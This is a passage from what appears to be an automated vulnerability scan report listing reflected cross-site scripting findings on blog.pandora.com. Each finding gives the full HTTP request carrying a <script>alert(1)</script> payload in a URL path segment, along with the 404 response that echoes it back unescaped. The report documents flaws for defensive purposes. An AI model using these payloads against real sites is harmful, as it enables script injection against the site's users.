Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora1e163<script>alert(1)</script>746a263de0b/archives/2006/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27be<script>alert(1)</script>78a1bab0ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc27be<script>alert(1)</script>78a1bab0ca3/2006/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3449<script>alert(1)</script>fffe6e73560 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b3449<script>alert(1)</script>fffe6e73560/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41581<script>alert(1)</script>c6f00e54db1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0841581<script>alert(1)</script>c6f00e54db1/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fc284<script>alert(1)</script>5ac9a5cf490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafc284<script>alert(1)</script>5ac9a5cf490/archives/2006/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29463<script>alert(1)</script>88dd0003541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives29463<script>alert(1)</script>88dd0003541/2006/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 826cd<script>alert(1)</script>9d679957bf3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006826cd<script>alert(1)</script>9d679957bf3/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7029<script>alert(1)</script>c9c50ef33cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/09a7029<script>alert(1)</script>c9c50ef33cc/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dc61<script>alert(1)</script>2a8a18ec9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:20 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2dc61<script>alert(1)</script>2a8a18ec9e0/archives/2006/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ee470<script>alert(1)</script>1e1c157cf31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesee470<script>alert(1)</script>1e1c157cf31/2006/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9eab0<script>alert(1)</script>503e2b138de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20069eab0<script>alert(1)</script>503e2b138de/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f7d2c<script>alert(1)</script>8f8c0843fd5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/10f7d2c<script>alert(1)</script>8f8c0843fd5/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fc20<script>alert(1)</script>d72027cb382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8fc20<script>alert(1)</script>d72027cb382/archives/2006/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e051<script>alert(1)</script>cfbbd073882 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4e051<script>alert(1)</script>cfbbd073882/2006/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b74cd<script>alert(1)</script>9b829fedb43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b74cd<script>alert(1)</script>9b829fedb43/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4491<script>alert(1)</script>0e7243d947a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/11e4491<script>alert(1)</script>0e7243d947a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f27b<script>alert(1)</script>ff6cdc57baa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4f27b<script>alert(1)</script>ff6cdc57baa/archives/2006/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b166<script>alert(1)</script>c595edeaf7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7b166<script>alert(1)</script>c595edeaf7d/2006/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d7d6<script>alert(1)</script>9c1bb7f29d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20064d7d6<script>alert(1)</script>9c1bb7f29d6/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 89734<script>alert(1)</script>10ad202e6f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/1289734<script>alert(1)</script>10ad202e6f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
